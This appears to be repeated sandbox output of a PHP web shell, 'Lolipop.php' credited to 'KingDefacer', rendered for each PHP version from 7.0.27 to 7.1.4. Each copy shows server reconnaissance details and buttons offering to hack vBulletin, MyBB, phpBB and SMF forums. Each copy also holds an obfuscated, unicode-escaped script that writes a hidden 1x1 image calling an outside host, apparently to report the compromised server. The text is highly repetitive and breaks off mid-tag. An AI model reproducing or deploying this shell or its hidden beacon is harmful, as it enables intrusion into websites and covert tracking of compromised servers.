type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.4
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.4</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.3
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.3</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.2
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.2</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.1
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.1</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.0
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.0</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.33
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.33</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.32
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.32</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.31
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.31</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.30
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.30</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.29
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.29</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.28
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.28</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.27
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.27</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' 